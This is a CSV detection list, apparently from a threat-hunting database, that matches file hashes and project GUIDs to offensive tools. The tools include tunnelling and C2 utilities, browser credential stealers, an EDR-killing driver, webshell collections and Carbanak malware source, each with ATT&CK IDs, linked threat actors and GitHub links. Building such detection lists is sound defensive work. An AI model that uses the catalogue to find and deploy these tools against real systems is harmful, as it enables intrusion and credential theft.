"*1a88b6412bb1e6349948bc6abdc0eebb5df61cc8c0a7ec9709310a77dbc7bccb*",".{0,1000}1a88b6412bb1e6349948bc6abdc0eebb5df61cc8c0a7ec9709310a77dbc7bccb.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","22610"
"*1A8C9BD8-1800-46B0-8E22-7D3823C68366*",".{0,1000}1A8C9BD8\-1800\-46B0\-8E22\-7D3823C68366.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","0","#GUIDproject","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","22611"
"*1A99EBED-6E53-469F-88B7-F4C3D2C96B07*",".{0,1000}1A99EBED\-6E53\-469F\-88B7\-F4C3D2C96B07.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#GUIDProject","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","22613"
"*1a9b73e2c74c9c5b48ad54e0aa0babe1241d117bc7a9c4cdf7977380da23e089*",".{0,1000}1a9b73e2c74c9c5b48ad54e0aa0babe1241d117bc7a9c4cdf7977380da23e089.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22614"
"*1aa328de71a7199a03005b39e9c8e73c2ca6f73e9d55615189cf21690f7cd6f9*",".{0,1000}1aa328de71a7199a03005b39e9c8e73c2ca6f73e9d55615189cf21690f7cd6f9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22616"
"*1aa9f8c15c189d98c2f6e05c511bd3452543a3ba700d9a6b5f3279ce8a1fcaea*",".{0,1000}1aa9f8c15c189d98c2f6e05c511bd3452543a3ba700d9a6b5f3279ce8a1fcaea.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22618"
"*1aab058ee1e02a5d2b3cf8604b9bbeaa6dc2cf4a383cf43916a19169ec875a9c*",".{0,1000}1aab058ee1e02a5d2b3cf8604b9bbeaa6dc2cf4a383cf43916a19169ec875a9c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22619"
"*1aade6ab28b468f362122c2b96f45f572a66142e09214b30467bc3d97a345d0b*",".{0,1000}1aade6ab28b468f362122c2b96f45f572a66142e09214b30467bc3d97a345d0b.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","22620"
"*1aae160624edaabb7748ba4c5042c79672f48a5925aa392400c3aa96573d01df*",".{0,1000}1aae160624edaabb7748ba4c5042c79672f48a5925aa392400c3aa96573d01df.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource Development","https://github.com/rzte/pdf-exploit","1","0","#filehash","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","22621"
"*1aae21b70df4615e79ff0864773b793f6b4ec88e2f1b00fdd419622e775617e5*",".{0,1000}1aae21b70df4615e79ff0864773b793f6b4ec88e2f1b00fdd419622e775617e5.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","22622"
"*1ab0edd5c7848f664b87d0ad9a7f2e081ea5500b13f38eaaf6a1720c2a7337fa*",".{0,1000}1ab0edd5c7848f664b87d0ad9a7f2e081ea5500b13f38eaaf6a1720c2a7337fa.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","22623"
"*1ab1fb9214bf799302b9204b211eec714d0c1fd551ca45adeab8483a350719a3*",".{0,1000}1ab1fb9214bf799302b9204b211eec714d0c1fd551ca45adeab8483a350719a3.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22624"
"*1ac060935cf018c68c0143a2a1647b3e11c305ff652abf603bb0caf1f9dedf50*",".{0,1000}1ac060935cf018c68c0143a2a1647b3e11c305ff652abf603bb0caf1f9dedf50.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","22626"
"*1ac39556a986e4338e44ab2e94fcc34fd12cd690feeef22161d255bd1067d7e1*",".{0,1000}1ac39556a986e4338e44ab2e94fcc34fd12cd690feeef22161d255bd1067d7e1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22627"
"*1aca0bdeda834669cd00738ec80f1f092531d1b1d8f7927c05029f0978544035*",".{0,1000}1aca0bdeda834669cd00738ec80f1f092531d1b1d8f7927c05029f0978544035.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22630"
"*1acd7ea1364e9c78d271cc8341ae804e8a6e143d4c31103d6dd5424dbc80498a*",".{0,1000}1acd7ea1364e9c78d271cc8341ae804e8a6e143d4c31103d6dd5424dbc80498a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22631"
"*1ad1c6e6c95a5a5064706a0312e0668eda560fafd0ceea59eaf6441e3735a39d*",".{0,1000}1ad1c6e6c95a5a5064706a0312e0668eda560fafd0ceea59eaf6441e3735a39d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22633"
"*1ad347c4e88e8425849acdf2ec2f35e690123f7eac1d16355df57b9f4d85632e*",".{0,1000}1ad347c4e88e8425849acdf2ec2f35e690123f7eac1d16355df57b9f4d85632e.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","22634"
"*1ada2351bf027363a8dd71c06a73a7450f52f6b85a0bd08e0e51d83b379172d7*",".{0,1000}1ada2351bf027363a8dd71c06a73a7450f52f6b85a0bd08e0e51d83b379172d7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22636"
"*1ae56e7ebbdbbd3912b3bec2f08c065895e82492494c26d076cce466dd0572ad*",".{0,1000}1ae56e7ebbdbbd3912b3bec2f08c065895e82492494c26d076cce466dd0572ad.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","22637"
"*1ae74ae5b25ae884783a0bca12f63b026a78c123a36ba980f1f931087024354b*",".{0,1000}1ae74ae5b25ae884783a0bca12f63b026a78c123a36ba980f1f931087024354b.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","22638"
"*1ae96f5eef721bc51a89dae07a4635d29531b2e11ee497e17619f00b07acf1b2*",".{0,1000}1ae96f5eef721bc51a89dae07a4635d29531b2e11ee497e17619f00b07acf1b2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22639"
"*1aebc75f4a66ba1711c288235dad6ac01c59e8801e8a1c2151cbb7dfd4c2c098*",".{0,1000}1aebc75f4a66ba1711c288235dad6ac01c59e8801e8a1c2151cbb7dfd4c2c098.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","0","#filehash","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","22641"
"*1aec829442fb9d5d32cb59019f608c9e98af9ebff8b56168f38ac5e222c888ba*",".{0,1000}1aec829442fb9d5d32cb59019f608c9e98af9ebff8b56168f38ac5e222c888ba.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22642"
"*1aed62a63b4802e599bbd33162319129501d603cceeb5e1eb22fd4733b3018a3*",".{0,1000}1aed62a63b4802e599bbd33162319129501d603cceeb5e1eb22fd4733b3018a3.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","#filehash","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","22643"
"*1af1c92c7a9a60a740d6351d935cb24d5c8ba7bde5a54bff8931a40bb6a2aa28*",".{0,1000}1af1c92c7a9a60a740d6351d935cb24d5c8ba7bde5a54bff8931a40bb6a2aa28.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","22645"
"*1af3fc48ae5984de558e620579cba8421fc8501a7494e4b0ec410c8caf302a85*",".{0,1000}1af3fc48ae5984de558e620579cba8421fc8501a7494e4b0ec410c8caf302a85.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","22647"
"*1af96d83e204abefa20c59e17e4a43ba2752360aadaecc0a8885537108f1aec3*",".{0,1000}1af96d83e204abefa20c59e17e4a43ba2752360aadaecc0a8885537108f1aec3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22648"
"*1af9e71cddf3b8cc8d9bd5004d29fc594400452a727856db23af24a0e3999de7*",".{0,1000}1af9e71cddf3b8cc8d9bd5004d29fc594400452a727856db23af24a0e3999de7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22650"
"*1AFD1BA3-028A-4E0F-82A8-095F38694ECF*",".{0,1000}1AFD1BA3\-028A\-4E0F\-82A8\-095F38694ECF.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","#GUIDproject","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","22651"
"*1aff544e58c3eda489ae9b59f32a10175d95e1aac12a4fbf25a40c40a1cc6c74*",".{0,1000}1aff544e58c3eda489ae9b59f32a10175d95e1aac12a4fbf25a40c40a1cc6c74.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","22652"
"*1b00063bdd544b4c03f152baa78efa863cb073a8a068f4e8316489b3a0d61846*",".{0,1000}1b00063bdd544b4c03f152baa78efa863cb073a8a068f4e8316489b3a0d61846.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","22653"
"*1b191ef3f920d48b1f4b8e9db4df2cb518d3c067eeb29b7bbe4ea48c4392de65*",".{0,1000}1b191ef3f920d48b1f4b8e9db4df2cb518d3c067eeb29b7bbe4ea48c4392de65.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22655"
"*1b1aefd0619b7d630dbb6a1ba16a77adfc9c26b608768d119e1bdf4d3da98ec7*",".{0,1000}1b1aefd0619b7d630dbb6a1ba16a77adfc9c26b608768d119e1bdf4d3da98ec7.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22656"
"*1b1b954cd8593a3d62bfc75524952c11499f269510fd1039a9ec5fa9655b92a7*",".{0,1000}1b1b954cd8593a3d62bfc75524952c11499f269510fd1039a9ec5fa9655b92a7.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","22657"
"*1b1e2f33f8c7e670cc340e679cc6deb60a81143659e5383a747c72da84822fce*",".{0,1000}1b1e2f33f8c7e670cc340e679cc6deb60a81143659e5383a747c72da84822fce.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22658"
"*1B1F64B3-B8A4-4BBB-BB66-F020E2D4F288*",".{0,1000}1B1F64B3\-B8A4\-4BBB\-BB66\-F020E2D4F288.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#GUIDproject","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","22659"
"*1b209500451ebe2bbe420a1ff33d946fa9e9e00399abda9ebcf9b0258fbe7902*",".{0,1000}1b209500451ebe2bbe420a1ff33d946fa9e9e00399abda9ebcf9b0258fbe7902.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","22660"
"*1b220d5538e63244c3b81a0c7a83ebb9ac7b0cdaed9f3e84057a812d7192b9b2*",".{0,1000}1b220d5538e63244c3b81a0c7a83ebb9ac7b0cdaed9f3e84057a812d7192b9b2.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#filehash","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","22661"
"*1b2b249d1cc2d53c4d21bfbd0a1ab7548e2ac369b13bdba538c76ba7813ce595*",".{0,1000}1b2b249d1cc2d53c4d21bfbd0a1ab7548e2ac369b13bdba538c76ba7813ce595.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22662"
"*1b2c21dd0c747782c5b23b0ca390a23a17cb3fe437021c5f44e5d77d6b71f656*",".{0,1000}1b2c21dd0c747782c5b23b0ca390a23a17cb3fe437021c5f44e5d77d6b71f656.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22663"
"*1b33fdc94279d8b040437fb7058747c6d151265df5fc3444c27a025daf83c988*",".{0,1000}1b33fdc94279d8b040437fb7058747c6d151265df5fc3444c27a025daf83c988.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22664"
"*1b38d47cdafe878dabc195a125987f06d04730fa8ac836ffad80e5f3d5721a8a*",".{0,1000}1b38d47cdafe878dabc195a125987f06d04730fa8ac836ffad80e5f3d5721a8a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22666"
"*1B3C96A3-F698-472B-B786-6FED7A205159*",".{0,1000}1B3C96A3\-F698\-472B\-B786\-6FED7A205159.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#GUIDproject","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","22668"
"*1B3D331BD6ABC44B54119E00509215AE3EA4B482DDB0C9F0D21D71C24EC3B5B6*",".{0,1000}1B3D331BD6ABC44B54119E00509215AE3EA4B482DDB0C9F0D21D71C24EC3B5B6.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","22669"
"*1B454840-E496-4F27-AA18-439A4E97BCC6*",".{0,1000}1B454840\-E496\-4F27\-AA18\-439A4E97BCC6.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","22672"
"*1b46ed14bbd4feb50be61fb1f3535adbca65d4927a3f14eaa19202deebe29041*",".{0,1000}1b46ed14bbd4feb50be61fb1f3535adbca65d4927a3f14eaa19202deebe29041.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22673"
"*1b4874bdc2c7947b4ff389e6f408f10b44376bff4d5404040a4b01fdacfe2dec*",".{0,1000}1b4874bdc2c7947b4ff389e6f408f10b44376bff4d5404040a4b01fdacfe2dec.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22674"
"*1b4c47566288f418c735f2330f1820a02dd7eaf44427bab650da097c013d9b41*",".{0,1000}1b4c47566288f418c735f2330f1820a02dd7eaf44427bab650da097c013d9b41.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22675"
"*1b505dc8b0d60061082cb43caa8bc7af56f1b2a5064bc0040f4963b0735004ed*",".{0,1000}1b505dc8b0d60061082cb43caa8bc7af56f1b2a5064bc0040f4963b0735004ed.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22677"
